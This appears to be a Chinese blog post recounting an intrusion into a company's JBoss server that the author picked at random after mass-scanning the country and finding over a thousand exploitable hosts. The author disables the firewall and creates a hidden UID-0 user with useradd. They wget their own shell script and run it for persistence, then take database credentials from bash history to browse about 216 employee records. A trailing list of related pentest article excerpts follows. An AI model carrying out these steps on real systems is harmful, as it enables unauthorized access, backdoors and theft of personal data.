记一次曲折的渗透测试经历

昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.

工具地址在:https://github.com/Xyntax/POC-T

随意拿了一个看似大厂商的,作本次入侵测试

发现传送门

通过jexboss拿到shell,看到是centos的机器(IP已打码).

看起来是root,确认一下.

不稳定的传送门

shell的问题

接下来执行命令的时候,发现这个jexboss自带的shell很不稳定.出现各种问题,包括但不限于以下两个严重问题:

- 执行有交互的命令时,程序会崩溃退出.比如说:cat命令会正常回显,但是vi命令会导致shell直接报错退出.

- 命令错误时,无回显

只好自己再做个稳定的shell

nc的尝试

看到系统有nc.我想简单用nc弹个稳定的shell回来,发现我提交的所有nc命令都没有回显,且连不上shell.

Py的尝试

放弃了nc,看看系统有没有python,结果还是--version没回显,但是有-h

然后我又想用py弹个shell回来,用了这段代码,发现也没有成功,有点古怪.

我又执行了一句简单的print,仍然没有回显!

why?

这里我思考了一下,如果它是因为报错了才无回显.那么能引起报错的应该是代码中( ) ‘ "等特殊字符在传输过程出现了错误.

我又用几个简单的shell代码具体测试了一下,证实猜测:

- 含有 " | > >> & 等特殊字符的命令,均不能执行.且没有回显

这意味着?

这意味着我基本不能通过这个shell执行含有非字母字符的命令了!

不能使用nc,不能使用python,管道,重定向都不行了

SSH的尝试

看来这个shell基本是废的.看了下进程,端口,以及iptables防火墙,发现一些针对性的配置,说明还是部署了一些安全防御的.看到22端口后,我果断关了防火墙.我新建个用户,然后外面用ssh连不就OK了么

于是我新建了一个管理员用户

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php

查看了一下/etc/passwd没有问题,创建成功!

然后在修改其密码时

passwd php

没有回显!!!

我想起来,这个修改密码的动作是要用户交互几次的.之前说过,执行交互的命令都是报错退出,没回显..所以又完蛋了

一般ssh都不会允许空密码连接的,我试了一下,结果像这样.

ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused

我查看下ssh的配置文件cat /etc/ssh/sshd_config

结果如下:

#   $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 2525

#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

除了配置文件里禁止了空密码登录外,管理员还把ssh的默认端口改成了2525,可以可以

于是我在配置文件里加一句话,允许空密码登录不就OK了么.

然而我在写命令时,不能用非字母字符!还不能使用编辑器交互!

vi直接崩,sed不行,echo重定向也不行...

稳定的传送门

根据这个辣鸡shell的臊性,看来我是很难往系统里写入东西了,于是在外部下载代码本地执行总可以的吧,反正有Python了.

wget xxx.xxx.xxx 这个命令没有特殊字符!应该可以执行

写了个脚本挂在我的服务器上,再从目标机wget到本地.

ls出来的时候,我就炸了!

果断python shell.py ,看到那个sh-4.1 出来的时候就知道搞定了!

然后改了我建立用户的密码,外部ssh连接,传送门终于稳定下来.

逛逛数据库

拿到稳定的shell,看看数据库

试试在命令历史中寻找相关命令:

cat ~/.bash_history |grep sql

结果如下,果然有货

不费吹灰之力进了数据库:

mysql里面的命令行对我来说早就轻车熟路

use information_schema

select table_name,table_rows from tables where TABLE_SCHEMA = ‘cloudcompany‘ order by table_rows desc;

管理员表:

都是员工数据(216条数据),来看一条:

挑一些有用的看看:

另外一个表(30W数据):

结语

看来数据库没太多东西.边做边写文章效率太低,已经工作快四个小时了,内网什么的不做了,交漏洞走人!

注:本文已屏蔽所有敏感数据,仅供技术交流,该入侵事件已提交乌云漏洞平台.

转载请注明出处,并告知本人

mail: [email protected]

时间: 2024-10-08 23:49:25

记一次曲折的渗透测试经历的相关文章

记一次曲折的渗透

那是一个无聊的下午,我还在折腾我的ettercap,接到基友的呼唤,要用我手上的资源搞个对象,我仔细想了下,如果在对方的局域网内的话,这事就显的好办多了,因为要用139.445这是个校园局域网.于是乎我就开始搞学校的站,因为在校站的服务器上就和这家伙接壤了~所以就引出了这次非常和谐各种曲折的渗透经历啊:) 1.目标发现 想着随便搞个站就行,也没有特定的目标,果断google hacking了一下.手工判断了下找到的几个链接,目测其中一个是mssql,放到havij里一试便知了.人品确实不错,是s

记一次渗透测试实战

0x00 渗透测试目标 目标:荷兰某厂商(不好意思,厂商信息不能写) 内容:渗透测试 0x01 信息收集 服务器:Microsoft-IIS/7.5 Web应用:ASP.NET 数据库:Access(数据库也太小了) 目标端口:扫描了没啥有用的. Whois: 0x02 SQL注入 找到注入了.但是由于数据库太low,跑得太慢了,暂停深入. 0x03 猜后台&爆破 很容易猜到后台了,但是爆破不太顺利.估计密码设置超复杂,暂停不猜,继续换姿势. 0x04 未授权访问 发现网站在添加管理员页面存在未

Metasploit渗透测试魔鬼训练营

首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想. 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思

《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透

继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术 1.WEB应用渗透基础知识 先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询) Sql注入攻击:大致分为 普通注入和盲注 跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS 跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求. 会话认证管理缺陷:验证身份的功能存在缺陷. 安全误配置:开发和管理人员的失误导致存在漏洞. 不安全密码存

Python:渗透测试开源项目

Python:渗透测试开源项目[源码值得精读] sql注入工具:sqlmap DNS安全监测:DNSRecon 暴力破解测试工具:patator XSS漏洞利用工具:XSSer Web服务器压力测试工具:HULK SSL安全扫描器:SSLyze 网络 Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library pypcap, Pcapy and pylibpcap:

2017年度渗透测试神器TOP10

现在,安全研究者对网站或者应用程序进行渗透测试而不用任何自动化工具似乎已越来越难.因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功半壁江山. 如果你在网络上搜索渗透测试工具,你会找到一大堆,其中不乏付费的.免费的.商业的以及开源的.但是,热门的测试工具都有哪些呢?这里我们将为大家梳理出2017年度十大最佳渗透测试工具. 之所以强调是本年度的,这点尤为重要,因为研究者使用的工具年复一年的都在发生着变化. Metasploit--独一无二,不可取代 Metasploit自200

Python:渗透测试开源项目【源码值得精读】

sql注入工具:sqlmap DNS安全监测:DNSRecon 暴力破解测试工具:patator XSS漏洞利用工具:XSSer Web服务器压力测试工具:HULK SSL安全扫描器:SSLyze 网络 Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library pypcap, Pcapy and pylibpcap: several different Python

【渗透技术】渗透测试技术分析_TomCat

[渗透技术]渗透测试技术分析_TomCat 本文转自:i春秋论坛 渗透测试-中间人攻击(原理)说起“中间人攻击”我想大多数对渗透测试又了解的朋友都多少有所了解,因为我们用到的次数真是非常的多.它可以将受害者发往服务器端的流量劫持到攻击者的计算机中,隐私得不到保证. 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间. 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的S

小白入坑 Web 渗透测试必备指南

本文来自作者 肖志华 在 GitChat 上分享「Web 渗透测试入坑必备指南」,「阅读原文」查看交流实录 「文末高能」 编辑 | 黑石 小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我.再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过. 小白该如何踏入 Web 安全这个坑呢?我的经历是,兴趣所在.我是野路子,全靠兴趣来自学. 现 Web 安全如果要讲入门,要求并不高,两三天就能入门,而我也仅在入门级别. 我接触这个比较早,最初是在10年还是